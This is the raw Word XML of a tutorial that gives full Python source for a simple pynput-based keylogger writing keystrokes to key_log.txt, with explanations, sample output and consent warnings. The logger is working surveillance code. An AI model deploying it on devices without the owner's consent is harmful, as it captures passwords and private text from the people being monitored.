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91AC1"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A </w:t>
      </w:r>
      <w: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Simple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> keylogger</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> involves capturing keystrokes and logging them to a file. Below is an example of such a program written in Python using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>pynput</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> library. This program should be used responsibly and only with proper authorization, as creating and deploying keyloggers without permission is unethical and often illegal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D29EE54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97FD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Code Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D12A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pynput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keyboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9226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on_press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4989D06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00C2372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Callback function for key press events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D56F3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Logs the pressed key to a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484CE9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631710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FB8ED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Attempt to write the key to the log file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607D61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"key_log.txt"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log_file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568FAC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hasattr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(key,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'char'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key.char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None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Printable characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049A87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log_file.write(key.char)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46921A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== keyboard.Key.space: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Handle space separately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAF10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log_file.write(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83FB0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 Handle special keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6D75A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log_file.write(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 [{key}] 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32C049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except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Exception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e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A069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f"Error: {e}"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CDE66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on_release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</w:p>
    <w:p w14:paraId="2CEFEAE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13CAC41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Callback function for key release events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713073A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Exits the listener if the 'ESC' key is pressed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6857A6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135882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 == keyboard.Key.esc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0E6A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"Exiting keylogger..."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515ABC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</w:p>
    <w:p w14:paraId="33C096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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD885A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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1273AAF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Main function to start the keylogger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0045211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Listens for keyboard events and handles them with callback functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD3F6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6B95F3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"Keylogger is running. Press 'ESC' to stop."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455558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with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keyboard.Listener(on_press=on_press, on_release=on_release)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listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197191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listener.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4988EB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"__main__"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70A9A0B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main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1A8855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2F02D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Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F49AD28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Importing the Required Library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7129EA54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pynput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keyboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F1BD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pynput.keyboard</w:t>
      </w:r>
      <w:r>
        <w:t>: A module for listening to keyboard events. It allows capturing key presses and releases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903C8DB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88726F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Callback Function for Key Press Events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CEA4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on_press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key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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245B15D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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D13B8A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Callback function for key press events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589A457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Logs the pressed key to a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2DA2F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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFE2D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This function is triggered whenever a key is pressed. It logs the pressed key into a file named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>key_log.txt</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CACAD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1AB19D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Handling Key Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F3A6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hasattr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(key,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'char'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and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key.char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is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None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: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# Printable characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5381B1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log_file.write(key.char)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elif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key == keyboard.Key.space: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# Handle space separately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABD66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log_file.write(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 "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else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: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# Handle special keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F0A6E1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log_file.write(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f" [{key}] "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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D6B3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Printable Characters</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Checks if the key has a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attribute and logs it directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD34A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Space Key</w:t>
      </w:r>
      <w:r>
        <w:t>: Writes a space to the log file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310B88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Special Keys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Keys like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>Shift</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>Ctrl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, etc., are logged in brackets (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>[Shift]</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3992827D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EC9F2D">
      <w:pPr>
        <w:pStyle w:val="3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4751014F">
      <w:pPr>
        <w:pStyle w:val="3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0A3C70C7">
      <w:pPr>
        <w:pStyle w:val="3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10"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Callback Function for Key Release Events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336009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on_release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key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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F204D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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5496A69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Callback function for key release events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1646D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Exits the listener if the 'ESC' key is pressed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D602D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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073C0A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key == keyboard.Key.esc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABB50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"Exiting keylogger..."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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187552BA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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BFC7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Exit Condition</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: If the user presses the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>ESC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key, the function returns </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
      <w:r>
        <w:t>, stopping the keylogger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEC04A0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62A44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Main Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA2E0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main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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A014DC8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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4EAB5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Main function to start the keylogger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5AD59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Listens for keyboard events and handles them with callback functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11015F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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F21BF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"Keylogger is running. Press 'ESC' to stop."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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246597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with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keyboard.Listener(on_press=on_press, on_release=on_release)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listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A90D72">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs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       listener.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05355A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Keyboard Listener</w:t>
      </w:r>
      <w:r>
        <w:t>: Listens for key press and release events and calls the respective callback functions (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>on_press</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>on_release</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58786A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Listener Join</w:t>
      </w:r>
      <w:r>
        <w:t>: Keeps the program running until the listener is explicitly stopped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C9100D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BA2F9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How It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543214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Run the Script</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD279D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program listens for keyboard events as soon as it starts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DDED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Log Keys</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D1965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Every key pressed is recorded in a file (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>key_log.txt</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499A3BA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Special keys are logged in a readable format (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>[Enter]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>[Tab]</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125DA0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55479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Exit</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5C50F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Pressing the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>ESC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key stops the keylogger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734FCB5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FDE6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Keylog File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B91D98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The file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>key_log.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will look like this after usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7921DBE0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hello world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[Enter]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this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test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[Backspace]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[Backspace]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test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0AD10B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A3489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Ethical Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F156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Permission</w:t>
      </w:r>
      <w:r>
        <w:t>: This script should only be run on devices with explicit consent from the owner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10117A9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Legal Compliance</w:t>
      </w:r>
      <w:r>
        <w:t>: Unauthorized use of keyloggers violates privacy laws and is illegal in most jurisdictions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F84FE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Use Cases</w:t>
      </w:r>
      <w:r>
        <w:t>: Examples of ethical use include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7821291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Monitoring user input during software testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4350EF9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Academic research with proper authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18854313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675273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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setup Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8913B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Setup Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F6076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Install Dependencies</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228E392A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pynput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45784B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Run the Script</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78622E3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Save the code in a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>keylogger.py</w:t>
      </w:r>
      <w:r>
        <w:t>) and run it using Python.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA14E7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Stop the Script</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B29371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Press the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>ESC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key to stop the keylogger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50727DFE"/>
    <w:p w14:paraId="21A94C4A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933F52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Enhancements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0FAB5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Add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>encryption</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the log file to prevent unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E70A77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Include </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>timestamp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for each key press.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C088E3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Allow user-defined </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>start and stop keys</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4E6766"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2D729"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8852D7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9D4442"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA9D4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83B2CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE83B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620A54"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E4620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6AF82B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F16AF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6F896BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="06F89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396233D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="439623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716FE1B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4716FE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D0364A0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6D036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2F29F3C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="72F29F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2554D"/>
    <w:rsid w:val="35A2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2025-01-17T15:12:00Z</dcterms:created>
  <dc:creator>Naman Sharma</dc:creator>
  <cp:lastModifiedBy>Naman Sharma</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-17T15:21:35Z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964273A0CA59403B950DD4E08B51A8F3_11</vt:lpwstr>
  </property>
</Properties>
</file>